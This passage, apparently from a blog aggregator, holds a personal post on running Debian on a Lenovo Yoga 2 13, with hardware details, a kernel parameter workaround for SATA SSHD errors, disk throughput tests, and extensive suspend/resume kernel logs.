For people who are interested in improving the way their organization sends communications to customers, a popular choice is the Apache Camel integration framework. I've deployed Camel for customer trade notification and other purposes at several large and well known firms in financial services. It has a rich set of features for transforming messages, including a PGP data format for encryption and it is able to send messages out using a vast number of connectivity options, including many of the basic ones like SMTP, SMPP (for SMS), XMPP/Jabber and message queues.

19 May 2015

Ritesh Raj Sarraf: Lenovo Yoga 2 13 with Debian

I recently acquired a Lenovo Yoga 2 13. While, at the time, the Yoga 3 was available, I decided to go for Yoga 2 13. The Yoga 3 comes with the newer Core M Broadwell family, which, in my opinion, doesn't really bring any astounding benefits. The Yoga 2 13 comes in mulitple variants worldwide. Infact these hardware variations have different effets when run under Linux. My varaint of Yoga 2 13 is:
CPU: Intel(R) Core(TM) i7-4510U CPU @ 2.00GHz
RAM: 8 GiB - Occupying 2 slots
Memory Controller Information
        Supported Interleave: One-way Interleave
        Current Interleave: One-way Interleave
        Maximum Memory Module Size: 8192 MB
        Maximum Total Memory Size: 16384 MB
Handle 0x0006, DMI type 6, 12 bytes
Handle 0x0007, DMI type 6, 12 bytes
The usual PCI devices:
rrs@learner:~$ lspci
00:00.0 Host bridge: Intel Corporation Haswell-ULT DRAM Controller (rev 0b)
00:02.0 VGA compatible controller: Intel Corporation Haswell-ULT Integrated Graphics Controller (rev 0b)
00:03.0 Audio device: Intel Corporation Haswell-ULT HD Audio Controller (rev 0b)
00:14.0 USB controller: Intel Corporation 8 Series USB xHCI HC (rev 04)
00:16.0 Communication controller: Intel Corporation 8 Series HECI #0 (rev 04)
00:1b.0 Audio device: Intel Corporation 8 Series HD Audio Controller (rev 04)
00:1c.0 PCI bridge: Intel Corporation 8 Series PCI Express Root Port 4 (rev e4)
00:1d.0 USB controller: Intel Corporation 8 Series USB EHCI #1 (rev 04)
00:1f.0 ISA bridge: Intel Corporation 8 Series LPC Controller (rev 04)
00:1f.2 SATA controller: Intel Corporation 8 Series SATA Controller 1 [AHCI mode] (rev 04)
00:1f.3 SMBus: Intel Corporation 8 Series SMBus Controller (rev 04)
01:00.0 Network controller: Realtek Semiconductor Co., Ltd. RTL8723BE PCIe Wireless Network Adapter
And the storage devices
Device Model:     WDC WD5000M22K-24Z1LT0-SSHD-16GB
Device Model:     KINGSTON SM2280S3120G

The drive runs into serious performance problems when its SSHD's NCQ (mis)feature is under use in Linux <= 4.0.

[28974.232550] ata2.00: configured for UDMA/133
[28974.232565] ahci 0000:00:1f.2: port does not support device sleep
[28983.680955] ata1.00: exception Emask 0x10 SAct 0x7fffffff SErr 0x400100 action 0x6 frozen
[28983.681000] ata1.00: irq_stat 0x08000000, interface fatal error
[28983.681027] ata1: SError:   UnrecovData Handshk  
[28983.681052] ata1.00: failed command: WRITE FPDMA QUEUED
[28983.681082] ata1.00: cmd 61/40:00:b8:84:88/05:00:0a:00:00/40 tag 0 ncq 688128 out
                        res 40/00:3c:78:a9:88/00:00:0a:00:00/40 Emask 0x10 (ATA bus error)
[28983.681152] ata1.00: status:   DRDY  
[28983.681171] ata1.00: failed command: WRITE FPDMA QUEUED
[28983.681202] ata1.00: cmd 61/40:08:f8:89:88/05:00:0a:00:00/40 tag 1 ncq 688128 out
                        res 40/00:3c:78:a9:88/00:00:0a:00:00/40 Emask 0x10 (ATA bus error)
[28983.681271] ata1.00: status:   DRDY  
[28983.681289] ata1.00: failed command: WRITE FPDMA QUEUED
[28983.681316] ata1.00: cmd 61/40:10:38:8f:88/05:00:0a:00:00/40 tag 2 ncq 688128 out
                        res 40/00:3c:78:a9:88/00:00:0a:00:00/40 Emask 0x10 (ATA bus error)
[28983.681387] ata1.00: status:   DRDY  
[28983.681407] ata1.00: failed command: WRITE FPDMA QUEUED
[28983.681435] ata1.00: cmd 61/40:18:78:94:88/05:00:0a:00:00/40 tag 3 ncq 688128 out
                        res 40/00:3c:78:a9:88/00:00:0a:00:00/40 Emask 0x10 (ATA bus error)
[28983.697642] ata1.00: status:   DRDY  
[28983.697643] ata1.00: failed command: WRITE FPDMA QUEUED
[28983.697646] ata1.00: cmd 61/40:c8:38:65:88/05:00:0a:00:00/40 tag 25 ncq 688128 out
                        res 40/00:3c:78:a9:88/00:00:0a:00:00/40 Emask 0x10 (ATA bus error)
[28983.697647] ata1.00: status:   DRDY  
[28983.697648] ata1.00: failed command: WRITE FPDMA QUEUED
[28983.697651] ata1.00: cmd 61/40:d0:78:6a:88/05:00:0a:00:00/40 tag 26 ncq 688128 out
                        res 40/00:3c:78:a9:88/00:00:0a:00:00/40 Emask 0x10 (ATA bus error)
[28983.697651] ata1.00: status:   DRDY  
[28983.697652] ata1.00: failed command: WRITE FPDMA QUEUED
[28983.697656] ata1.00: cmd 61/40:d8:b8:6f:88/05:00:0a:00:00/40 tag 27 ncq 688128 out
                        res 40/00:3c:78:a9:88/00:00:0a:00:00/40 Emask 0x10 (ATA bus error)
[28983.697657] ata1.00: status:   DRDY  
[28983.697658] ata1.00: failed command: WRITE FPDMA QUEUED
[28983.697661] ata1.00: cmd 61/40:e0:f8:74:88/05:00:0a:00:00/40 tag 28 ncq 688128 out
                        res 40/00:3c:78:a9:88/00:00:0a:00:00/40 Emask 0x10 (ATA bus error)
[28983.697662] ata1.00: status:   DRDY  
[28983.697663] ata1.00: failed command: WRITE FPDMA QUEUED
[28983.697666] ata1.00: cmd 61/40:e8:38:7a:88/05:00:0a:00:00/40 tag 29 ncq 688128 out
                        res 40/00:3c:78:a9:88/00:00:0a:00:00/40 Emask 0x10 (ATA bus error)
[28983.697667] ata1.00: status:   DRDY  
[28983.697668] ata1.00: failed command: WRITE FPDMA QUEUED
[28983.697672] ata1.00: cmd 61/40:f0:78:7f:88/05:00:0a:00:00/40 tag 30 ncq 688128 out
                        res 40/00:3c:78:a9:88/00:00:0a:00:00/40 Emask 0x10 (ATA bus error)
[28983.697672] ata1.00: status:   DRDY  
[28983.697676] ata1: hard resetting link
[28984.017356] ata1: SATA link up 6.0 Gbps (SStatus 133 SControl 300)
[28984.022612] ata1.00: configured for UDMA/133
[28984.022740] ata1: EH complete
[28991.611732] Suspending console(s) (use no_console_suspend to debug)
[28992.183822] sd 1:0:0:0: [sdb] Synchronizing SCSI cache
[28992.186569] sd 1:0:0:0: [sdb] Stopping disk
[28992.186604] sd 0:0:0:0: [sda] Synchronizing SCSI cache
[28992.189594] sd 0:0:0:0: [sda] Stopping disk
[28992.967426] PM: suspend of devices complete after 1351.349 msecs
[28992.999461] PM: late suspend of devices complete after 31.990 msecs
[28993.000058] ehci-pci 0000:00:1d.0: System wakeup enabled by ACPI
[28993.000306] xhci_hcd 0000:00:14.0: System wakeup enabled by ACPI
[28993.016463] PM: noirq suspend of devices complete after 16.978 msecs
[28993.017024] ACPI: Preparing to enter system sleep state S3
[28993.017349] PM: Saving platform NVS memory
[28993.017357] Disabling non-boot CPUs ...
[28993.017389] intel_pstate CPU 1 exiting
[28993.018727] kvm: disabling virtualization on CPU1
[28993.019320] smpboot: CPU 1 is now offline
[28993.019646] intel_pstate CPU 2 exiting

In the interim, to overcome this problem, we can force the device to run in degraded mode. I'm not sure if it is really the degraded mode, or the device was falsely advertised as a 6 GiB capable device. Time will tell, but for now, force it to run in 3 GiB mode, and so far, I haven't run into the above mentioned probems. To force 3 GiB speed, apply the following.

rrs@learner:~$ cat /proc/cmdline
BOOT_IMAGE=/vmlinuz-4.0.4+ root=/dev/mapper/sdb_crypt ro cgroup_enable=memory swapaccount=1 rootflags=data=writeback libata.force=1:3 quiet

And then verify it... As you can see below, I've forced it for ata1 because I want my SSD drive to run at full-speed. I've done enough I/O, which earlier resulted in the kernel spitting the SATA errors. With this workaround, the kernel does not spit any error messages.

[    1.273365] libata version 3.00 loaded.
[    1.287290] ahci 0000:00:1f.2: AHCI 0001.0300 32 slots 4 ports 6 Gbps 0x3 impl SATA mode
[    1.288238] ata1: FORCE: PHY spd limit set to 3.0Gbps
[    1.288240] ata1: SATA max UDMA/133 abar m2048@0xb051b000 port 0xb051b100 irq 41
[    1.288242] ata2: SATA max UDMA/133 abar m2048@0xb051b000 port 0xb051b180 irq 41
[    1.288244] ata3: DUMMY
[    1.288245] ata4: DUMMY
[    1.606971] ata1: SATA link up 3.0 Gbps (SStatus 123 SControl 320)
[    1.607906] ata1.00: ATA-9: WDC WD5000M22K-24Z1LT0-SSHD-16GB, 02.01A03, max UDMA/133
[    1.607910] ata1.00: 976773168 sectors, multi 0: LBA48 NCQ (depth 31/32), AA
[    1.608856] ata1.00: configured for UDMA/133
[    1.609106] scsi 0:0:0:0: Direct-Access     ATA      WDC WD5000M22K-2 1A03 PQ: 0 ANSI: 5
[    1.927167] ata2: SATA link up 6.0 Gbps (SStatus 133 SControl 300)
[    1.928980] ata2.00: ATA-8: KINGSTON SM2280S3120G, S8FM06.A, max UDMA/133
[    1.928983] ata2.00: 234441648 sectors, multi 16: LBA48 NCQ (depth 31/32), AA
[    1.929616] ata2.00: configured for UDMA/133

And the throughput you get out of your WD SATA SSHD drive, with capability set to 3.0 GiB is:

rrs@learner:/media/SSHD/tmp$ while true; do dd if=/dev/zero of=foo.img bs=1M count=20000; sync; rm -rf foo.img; sync; done
20000+0 records in
20000+0 records out
20971520000 bytes (21 GB) copied, 202.014 s, 104 MB/s
20000+0 records in
20000+0 records out
20971520000 bytes (21 GB) copied, 206.111 s, 102 MB/s

Hannes Reinecke has submitted patches for NCQ enhancements, for Linux 4.1, which I hope will resolve these problems. Another option is to disable NCQ for the drive, or else blacklist the make/model in driver/ata/libata-core.c

By the time I finished this blog entry draft, I had tests to conclude that this did not look like an NCQ problem. Because in degraded mode too, it runs with NCQ enabled (check above).

rrs@learner:~$ sudo fstrim -vv /media/SSHD
/media/SSHD: 268.2 GiB (287930949632 bytes) trimmed
rrs@learner:~$ sudo fstrim -vv /
[sudo] password for rrs:
/: 64 GiB (68650749952 bytes) trimmed

Another interesting feature of this drive is support for TRIM / DISCARD. This drive's FTL accepts the TRIM command. Ofcourse, you need to ensure that you have discard enabled in all the layers. In my case, SATA + Device Mapper (Crypt and LVM) + File System (ext4) Display

The overall display of this device is amazing. It is large enough to give you vibrant look. At 1920x1080 resolution, things look good. The display support was available out-of-the-box.

There were some suspend / resume hangs that occured with kernels < 4.x, during suspend / resume. The issue was root caused and fixed for Linux 4.0.

You may still notice the following kernel messages, though not problematic to me so far.

[28977.518114] PM: thaw of devices complete after 3607.979 msecs
[28977.590389] i915 0000:00:02.0: BAR 6: [??? 0x00000000 flags 0x2] has bogus alignment
[28977.590582] i915 0000:00:02.0: BAR 6: [??? 0x00000000 flags 0x2] has bogus alignment
[28977.591095] i915 0000:00:02.0: BAR 6: [??? 0x00000000 flags 0x2] has bogus alignment
[28977.591185] i915 0000:00:02.0: BAR 6: [??? 0x00000000 flags 0x2] has bogus alignment
[28977.591368] acpi device:30: Cannot transition to power state D3cold for parent in (unknown)
[28977.591911] pci_bus 0000:01: Allocating resources
[28977.591933] i915 0000:00:02.0: BAR 6: [??? 0x00000000 flags 0x2] has bogus alignment
[28977.592093] i915 0000:00:02.0: BAR 6: [??? 0x00000000 flags 0x2] has bogus alignment
[28977.592401] i915 0000:00:02.0: BAR 6: [??? 0x00000000 flags 0x2] has bogus alignment

You may need to disable the Intel Management Engine Interface (mei.ko), incase you run into suspend/resume problems.

rrs@learner:/media/SSHD/tmp$ cat /etc/modprobe.d/intel-mei-blacklist.conf
blacklist mei
blacklist mei-me

You may also run into the following Kernel Oops during suspend/resume. Below, you see 2 interation of sleep because it first hibernates and then sleeps (s2both).

[  180.470206] Syncing filesystems ... done.
[  180.473337] Freezing user space processes ... (elapsed 0.001 seconds) done.
[  180.475210] PM: Marking nosave pages: [mem 0x00000000-0x00000fff]
[  180.475213] PM: Marking nosave pages: [mem 0x0006f000-0x0006ffff]
[  180.475215] PM: Marking nosave pages: [mem 0x00088000-0x000fffff]
[  180.475220] PM: Marking nosave pages: [mem 0x97360000-0x97b5ffff]
[  180.475274] PM: Marking nosave pages: [mem 0x9c36f000-0x9cffefff]
[  180.475356] PM: Marking nosave pages: [mem 0x9d000000-0xffffffff]
[  180.476877] PM: Basic memory bitmaps created
[  180.477003] PM: Preallocating image memory... done (allocated 380227 pages)
[  180.851800] PM: Allocated 1520908 kbytes in 0.37 seconds (4110.56 MB/s)
[  180.851802] Freezing remaining freezable tasks ... (elapsed 0.001 seconds) done.
[  180.853355] Suspending console(s) (use no_console_suspend to debug)
[  180.853520] wlan0: deauthenticating from c4:6e:1f:d0:67:26 by local choice (Reason: 3=DEAUTH_LEAVING)
[  180.864159] cfg80211: Calling CRDA to update world regulatory domain
[  181.172222] PM: freeze of devices complete after 319.294 msecs
[  181.196080] ------------[ cut here ]------------
[  181.196124] WARNING: CPU: 3 PID: 3707 at drivers/gpu/drm/i915/intel_display.c:7904 hsw_enable_pc8+0x659/0x7c0 [i915]()
[  181.196125] SPLL enabled
[  181.196159] Modules linked in: rfcomm ctr ccm bnep pci_stub vboxpci(O) vboxnetadp(O) vboxnetflt(O) vboxdrv(O) bridge stp llc xt_conntrack iptable_filter ipt_MASQUERADE nf_nat_masquerade_ipv4 iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack xt_CHECKSUM xt_tcpudp iptable_mangle ip_tables x_tables nls_utf8 nls_cp437 vfat fat rtsx_usb_ms memstick snd_hda_codec_hdmi joydev mousedev hid_sensor_rotation hid_sensor_incl_3d hid_sensor_als hid_sensor_accel_3d hid_sensor_magn_3d hid_sensor_gyro_3d hid_sensor_trigger industrialio_triggered_buffer kfifo_buf industrialio hid_sensor_iio_common iTCO_wdt iTCO_vendor_support hid_multitouch x86_pkg_temp_thermal intel_powerclamp coretemp intel_rapl iosf_mbi kvm_intel kvm btusb hid_sensor_hub bluetooth uvcvideo videobuf2_vmalloc videobuf2_memops
[  181.196203]  videobuf2_core v4l2_common videodev media pcspkr evdev mac_hid arc4 psmouse serio_raw efivars i2c_i801 rtl8723be btcoexist rtl8723_common rtl_pci rtlwifi mac80211 snd_soc_rt5640 cfg80211 snd_soc_rl6231 snd_hda_codec_realtek i915 snd_soc_core snd_hda_codec_generic ideapad_laptop ac snd_compress dw_dmac sparse_keymap drm_kms_helper rfkill battery dw_dmac_core snd_hda_intel snd_pcm_dmaengine snd_soc_sst_acpi snd_hda_controller video 8250_dw regmap_i2c snd_hda_codec drm snd_hwdep snd_pcm spi_pxa2xx_platform i2c_designware_platform soc_button_array snd_timer i2c_designware_core snd i2c_algo_bit soundcore shpchp lpc_ich button processor fuse ipv6 autofs4 ext4 crc16 jbd2 mbcache btrfs xor raid6_pq algif_skcipher af_alg dm_crypt dm_mod sg usbhid sd_mod rtsx_usb_sdmmc rtsx_usb crct10dif_pclmul
[  181.196220]  crc32_pclmul crc32c_intel ghash_clmulni_intel aesni_intel aes_x86_64 lrw gf128mul glue_helper ablk_helper cryptd ahci libahci libata xhci_pci ehci_pci xhci_hcd ehci_hcd scsi_mod usbcore usb_common thermal fan thermal_sys hwmon i2c_hid hid i2c_core sdhci_acpi sdhci mmc_core gpio_lynxpoint
[  181.196224] CPU: 3 PID: 3707 Comm: kworker/u16:7 Tainted: G           O    4.0.4+ #14
[  181.196225] Hardware name: LENOVO 20344/INVALID, BIOS 96CN29WW(V1.15) 10/16/2014
[  181.196230] Workqueue: events_unbound async_run_entry_fn
[  181.196233]  0000000000000000 ffffffffa0706f68 ffffffff81522198 ffff880064debc88
[  181.196235]  ffffffff8106c5b1 ffff880251460000 ffff880250f83b68 ffff880250f83b78
[  181.196237]  ffff880250f83800 0000000000000001 ffffffff8106c62a ffffffffa071407c
[  181.196238] Call Trace:
[  181.196248]  [<ffffffff81522198>] ? dump_stack+0x40/0x50
[  181.196251]  [<ffffffff8106c5b1>] ? warn_slowpath_common+0x81/0xb0
[  181.196254]  [<ffffffff8106c62a>] ? warn_slowpath_fmt+0x4a/0x50
[  181.196278]  [<ffffffffa06ae349>] ? hsw_enable_pc8+0x659/0x7c0 [i915]
[  181.196289]  [<ffffffffa0643ee0>] ? intel_suspend_complete+0xe0/0x6e0 [i915]
[  181.196300]  [<ffffffffa0644501>] ? i915_drm_suspend_late+0x21/0x90 [i915]
[  181.196311]  [<ffffffffa0644690>] ? i915_pm_poweroff_late+0x40/0x40 [i915]
[  181.196318]  [<ffffffff813fa7ba>] ? dpm_run_callback+0x4a/0x100
[  181.196321]  [<ffffffff813fb010>] ? __device_suspend_late+0xa0/0x180
[  181.196324]  [<ffffffff813fb10e>] ? async_suspend_late+0x1e/0xa0
[  181.196326]  [<ffffffff8108b973>] ? async_run_entry_fn+0x43/0x160
[  181.196330]  [<ffffffff81083a5d>] ? process_one_work+0x14d/0x3f0
[  181.196332]  [<ffffffff81084463>] ? worker_thread+0x53/0x480
[  181.196334]  [<ffffffff81084410>] ? rescuer_thread+0x300/0x300
[  181.196338]  [<ffffffff81089191>] ? kthread+0xc1/0xe0
[  181.196341]  [<ffffffff810890d0>] ? kthread_create_on_node+0x180/0x180
[  181.196346]  [<ffffffff81527898>] ? ret_from_fork+0x58/0x90
[  181.196349]  [<ffffffff810890d0>] ? kthread_create_on_node+0x180/0x180
[  181.196350] ---[ end trace 8e339004db298838 ]---
[  181.220094] PM: late freeze of devices complete after 47.936 msecs
[  181.220972] PM: noirq freeze of devices complete after 0.875 msecs
[  181.221577] ACPI: Preparing to enter system sleep state S4
[  181.221886] PM: Saving platform NVS memory
[  181.222702] Disabling non-boot CPUs ...
[  181.222731] intel_pstate CPU 1 exiting
[  181.224041] kvm: disabling virtualization on CPU1
[  181.224680] smpboot: CPU 1 is now offline
[  181.225121] intel_pstate CPU 2 exiting
[  181.226407] kvm: disabling virtualization on CPU2
[  181.227025] smpboot: CPU 2 is now offline
[  181.227441] intel_pstate CPU 3 exiting
[  181.227728] Broke affinity for irq 19
[  181.227747] Broke affinity for irq 41
[  181.228771] kvm: disabling virtualization on CPU3
[  181.228793] smpboot: CPU 3 is now offline
[  181.229624] PM: Creating hibernation image:
[  181.563651] PM: Need to copy 379053 pages
[  181.563655] PM: Normal pages needed: 379053 + 1024, available pages: 1697704
[  182.472910] PM: Hibernation image created (379053 pages copied)
[  181.232347] PM: Restoring platform NVS memory
[  181.233171] Enabling non-boot CPUs ...
[  181.233246] x86: Booting SMP configuration:
[  181.233248] smpboot: Booting Node 0 Processor 1 APIC 0x1
[  181.246771] kvm: enabling virtualization on CPU1
[  181.249339] CPU1 is up
[  181.249389] smpboot: Booting Node 0 Processor 2 APIC 0x2
[  181.262313] kvm: enabling virtualization on CPU2
[  181.264853] CPU2 is up
[  181.264903] smpboot: Booting Node 0 Processor 3 APIC 0x3
[  181.277831] kvm: enabling virtualization on CPU3
[  181.280317] CPU3 is up
[  181.288471] ACPI: Waking up from system sleep state S4
[  182.340655] PM: noirq thaw of devices complete after 0.637 msecs
[  182.378087] PM: early thaw of devices complete after 37.428 msecs
[  182.378436] rtlwifi: rtlwifi: wireless switch is on
[  182.451021] rtc_cmos 00:01: System wakeup disabled by ACPI
[  182.697575] ata1: SATA link up 3.0 Gbps (SStatus 123 SControl 320)
[  182.697617] ata2: SATA link up 6.0 Gbps (SStatus 133 SControl 300)
[  182.699248] ata1.00: configured for UDMA/133
[  182.699911] ata2.00: configured for UDMA/133
[  182.699917] ahci 0000:00:1f.2: port does not support device sleep
[  186.059539] PM: thaw of devices complete after 3685.338 msecs
[  186.134292] i915 0000:00:02.0: BAR 6: [??? 0x00000000 flags 0x2] has bogus alignment
[  186.134479] i915 0000:00:02.0: BAR 6: [??? 0x00000000 flags 0x2] has bogus alignment
[  186.134992] i915 0000:00:02.0: BAR 6: [??? 0x00000000 flags 0x2] has bogus alignment
[  186.135080] i915 0000:00:02.0: BAR 6: [??? 0x00000000 flags 0x2] has bogus alignment
[  186.135266] acpi device:30: Cannot transition to power state D3cold for parent in (unknown)
[  186.135950] pci_bus 0000:01: Allocating resources
[  186.135974] pcieport 0000:00:1c.0: bridge window [mem 0x00100000-0x000fffff 64bit pref] to [bus 01] add_size 200000
[  186.135980] i915 0000:00:02.0: BAR 6: [??? 0x00000000 flags 0x2] has bogus alignment
[  186.136049] pcieport 0000:00:1c.0: res[15]=[mem 0x00100000-0x000fffff 64bit pref] get_res_add_size add_size 200000
[  186.136072] pcieport 0000:00:1c.0: BAR 15: assigned [mem 0x9fb00000-0x9fcfffff 64bit pref]
[  186.136174] i915 0000:00:02.0: BAR 6: [??? 0x00000000 flags 0x2] has bogus alignment
[  186.136490] i915 0000:00:02.0: BAR 6: [??? 0x00000000 flags 0x2] has bogus alignment
[  199.454497] Suspending console(s) (use no_console_suspend to debug)
[  200.024190] sd 1:0:0:0: [sdb] Synchronizing SCSI cache
[  200.024356] sd 0:0:0:0: [sda] Synchronizing SCSI cache
[  200.025359] sd 1:0:0:0: [sdb] Stopping disk
[  200.028701] sd 0:0:0:0: [sda] Stopping disk
[  201.106085] PM: suspend of devices complete after 1651.336 msecs
[  201.106591] ------------[ cut here ]------------
[  201.106628] WARNING: CPU: 0 PID: 3725 at drivers/gpu/drm/i915/intel_display.c:7904 hsw_enable_pc8+0x659/0x7c0 [i915]()
[  201.106628] SPLL enabled
[  201.106656] Modules linked in: rfcomm ctr ccm bnep pci_stub vboxpci(O) vboxnetadp(O) vboxnetflt(O) vboxdrv(O) bridge stp llc xt_conntrack iptable_filter ipt_MASQUERADE nf_nat_masquerade_ipv4 iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack xt_CHECKSUM xt_tcpudp iptable_mangle ip_tables x_tables nls_utf8 nls_cp437 vfat fat rtsx_usb_ms memstick snd_hda_codec_hdmi joydev mousedev hid_sensor_rotation hid_sensor_incl_3d hid_sensor_als hid_sensor_accel_3d hid_sensor_magn_3d hid_sensor_gyro_3d hid_sensor_trigger industrialio_triggered_buffer kfifo_buf industrialio hid_sensor_iio_common iTCO_wdt iTCO_vendor_support hid_multitouch x86_pkg_temp_thermal intel_powerclamp coretemp intel_rapl iosf_mbi kvm_intel kvm btusb hid_sensor_hub bluetooth uvcvideo videobuf2_vmalloc videobuf2_memops
[  201.106694]  videobuf2_core v4l2_common videodev media pcspkr evdev mac_hid arc4 psmouse serio_raw efivars i2c_i801 rtl8723be btcoexist rtl8723_common rtl_pci rtlwifi mac80211 snd_soc_rt5640 cfg80211 snd_soc_rl6231 snd_hda_codec_realtek i915 snd_soc_core snd_hda_codec_generic ideapad_laptop ac snd_compress dw_dmac sparse_keymap drm_kms_helper rfkill battery dw_dmac_core snd_hda_intel snd_pcm_dmaengine snd_soc_sst_acpi snd_hda_controller video 8250_dw regmap_i2c snd_hda_codec drm snd_hwdep snd_pcm spi_pxa2xx_platform i2c_designware_platform soc_button_array snd_timer i2c_designware_core snd i2c_algo_bit soundcore shpchp lpc_ich button processor fuse ipv6 autofs4 ext4 crc16 jbd2 mbcache btrfs xor raid6_pq algif_skcipher af_alg dm_crypt dm_mod sg usbhid sd_mod rtsx_usb_sdmmc rtsx_usb crct10dif_pclmul
[  201.106711]  crc32_pclmul crc32c_intel ghash_clmulni_intel aesni_intel aes_x86_64 lrw gf128mul glue_helper ablk_helper cryptd ahci libahci libata xhci_pci ehci_pci xhci_hcd ehci_hcd scsi_mod usbcore usb_common thermal fan thermal_sys hwmon i2c_hid hid i2c_core sdhci_acpi sdhci mmc_core gpio_lynxpoint
[  201.106714] CPU: 0 PID: 3725 Comm: kworker/u16:25 Tainted: G        W  O    4.0.4+ #14
[  201.106715] Hardware name: LENOVO 20344/INVALID, BIOS 96CN29WW(V1.15) 10/16/2014
[  201.106720] Workqueue: events_unbound async_run_entry_fn
[  201.106723]  0000000000000000 ffffffffa0706f68 ffffffff81522198 ffff880064dd7c88
[  201.106725]  ffffffff8106c5b1 ffff880251460000 ffff880250f83b68 ffff880250f83b78
[  201.106727]  ffff880250f83800 0000000000000002 ffffffff8106c62a ffffffffa071407c
[  201.106728] Call Trace:
[  201.106737]  [<ffffffff81522198>] ? dump_stack+0x40/0x50
[  201.106740]  [<ffffffff8106c5b1>] ? warn_slowpath_common+0x81/0xb0
[  201.106742]  [<ffffffff8106c62a>] ? warn_slowpath_fmt+0x4a/0x50
[  201.106765]  [<ffffffffa06ae349>] ? hsw_enable_pc8+0x659/0x7c0 [i915]
[  201.106776]  [<ffffffffa0643ee0>] ? intel_suspend_complete+0xe0/0x6e0 [i915]
[  201.106786]  [<ffffffffa0644501>] ? i915_drm_suspend_late+0x21/0x90 [i915]
[  201.106797]  [<ffffffffa0644690>] ? i915_pm_poweroff_late+0x40/0x40 [i915]
[  201.106802]  [<ffffffff813fa7ba>] ? dpm_run_callback+0x4a/0x100
[  201.106805]  [<ffffffff813fb010>] ? __device_suspend_late+0xa0/0x180
[  201.106809]  [<ffffffff813fb10e>] ? async_suspend_late+0x1e/0xa0
[  201.106811]  [<ffffffff8108b973>] ? async_run_entry_fn+0x43/0x160
[  201.106813]  [<ffffffff81083a5d>] ? process_one_work+0x14d/0x3f0
[  201.106815]  [<ffffffff81084463>] ? worker_thread+0x53/0x480
[  201.106818]  [<ffffffff81084410>] ? rescuer_thread+0x300/0x300
[  201.106821]  [<ffffffff81089191>] ? kthread+0xc1/0xe0
[  201.106824]  [<ffffffff810890d0>] ? kthread_create_on_node+0x180/0x180
[  201.106827]  [<ffffffff81527898>] ? ret_from_fork+0x58/0x90
[  201.106830]  [<ffffffff810890d0>] ? kthread_create_on_node+0x180/0x180
[  201.106832] ---[ end trace 8e339004db298839 ]---
[  201.130052] PM: late suspend of devices complete after 23.960 msecs
[  201.130725] ehci-pci 0000:00:1d.0: System wakeup enabled by ACPI
[  201.130885] xhci_hcd 0000:00:14.0: System wakeup enabled by ACPI
[  201.146986] PM: noirq suspend of devices complete after 16.930 msecs
[  201.147591] ACPI: Preparing to enter system sleep state S3
[  201.147942] PM: Saving platform NVS memory
[  201.147948] Disabling non-boot CPUs ...
[  201.147999] intel_pstate CPU 1 exiting
[  201.149324] kvm: disabling virtualization on CPU1
[  201.149337] smpboot: CPU 1 is now offline
[  201.149640] intel_pstate CPU 2 exiting
[  201.151096] kvm: disabling virtualization on CPU2
[  201.151108] smpboot: CPU 2 is now offline
[  201.152017] intel_pstate CPU 3 exiting
[  201.153250] kvm: disabling virtualization on CPU3
[  201.153256] smpboot: CPU 3 is now offline
[  201.156229] ACPI: Low-level resume complete
[  201.156307] PM: Restoring platform NVS memory
[  201.160033] CPU0 microcode updated early to revision 0x1c, date = 2014-07-03
[  201.160190] Enabling non-boot CPUs ...
[  201.160241] x86: Booting SMP configuration:
[  201.160243] smpboot: Booting Node 0 Processor 1 APIC 0x1
[  201.172665] kvm: enabling virtualization on CPU1
[  201.174982] CPU1 is up
[  201.175013] smpboot: Booting Node 0 Processor 2 APIC 0x2
[  201.187569] CPU2 microcode updated early to revision 0x1c, date = 2014-07-03
[  201.188796] kvm: enabling virtualization on CPU2
[  201.191130] CPU2 is up
[  201.191158] smpboot: Booting Node 0 Processor 3 APIC 0x3
[  201.203297] kvm: enabling virtualization on CPU3
[  201.205679] CPU3 is up
[  201.210414] ACPI: Waking up from system sleep state S3
[  201.224617] ehci-pci 0000:00:1d.0: System wakeup disabled by ACPI
[  201.332523] xhci_hcd 0000:00:14.0: System wakeup disabled by ACPI
[  201.332634] PM: noirq resume of devices complete after 121.623 msecs
[  201.372718] PM: early resume of devices complete after 40.058 msecs
[  201.372892] rtlwifi: rtlwifi: wireless switch is on
[  201.373270] sd 0:0:0:0: [sda] Starting disk
[  201.373271] sd 1:0:0:0: [sdb] Starting disk
[  201.445954] rtc_cmos 00:01: System wakeup disabled by ACPI
[  201.692510] ata2: SATA link up 6.0 Gbps (SStatus 133 SControl 300)
[  201.694719] ata2.00: configured for UDMA/133
[  201.694724] ahci 0000:00:1f.2: port does not support device sleep
[  201.836724] usb 2-4: reset high-speed USB device number 2 using xhci_hcd
[  201.890158] psmouse serio1: synaptics: queried max coordinates: x [..5702], y [..4730]
[  201.930768] psmouse serio1: synaptics: queried min coordinates: x [1242..], y [1124..]
[  202.076784] usb 2-5: reset full-speed USB device number 3 using xhci_hcd
[  202.205100] usb 2-5: ep 0x2 - rounding interval to 64 microframes, ep desc says 80 microframes
[  202.316799] usb 2-7: reset full-speed USB device number 5 using xhci_hcd
[  202.444945] usb 2-7: No LPM exit latency info found, disabling LPM.
[  202.556817] usb 2-8: reset full-speed USB device number 6 using xhci_hcd
[  202.908691] usb 2-6: reset high-speed USB device number 4 using xhci_hcd
[  203.932602] ata1: SATA link up 3.0 Gbps (SStatus 123 SControl 320)
[  204.044890] ata1.00: configured for UDMA/133
[  206.228698] PM: resume of devices complete after 4855.892 msecs
[  206.380738] i915 0000:00:02.0: BAR 6: [??? 0x00000000 flags 0x2] has bogus alignment
[  206.383152] i915 0000:00:02.0: BAR 6: [??? 0x00000000 flags 0x2] has bogus alignment
[  206.385775] i915 0000:00:02.0: BAR 6: [??? 0x00000000 flags 0x2] has bogus alignment
[  206.388066] i915 0000:00:02.0: BAR 6: [??? 0x00000000 flags 0x2] has bogus alignment
[  206.390415] acpi device:30: Cannot transition to power state D3cold for parent in (unknown)
[  206.393078] pci_bus 0000:01: Allocating resources
[  206.393098] i915 0000:00:02.0: BAR 6: [??? 0x00000000 flags 0x2] has bogus alignment
[  206.395470] i915 0000:00:02.0: BAR 6: [??? 0x00000000 flags 0x2] has bogus alignment
[  206.397927] i915 0000:00:02.0: BAR 6: [??? 0x00000000 flags 0x2] has bogus alignment
[  206.518516] Restarting kernel threads ... done.
[  206.518812] PM: Basic memory bitmaps freed
[  206.518816] Restarting tasks ... done.

There is one more occasional Kernel Oops (below), which I believe again has to do with Intel.

[ 8770.745396] ------------[ cut here ]------------
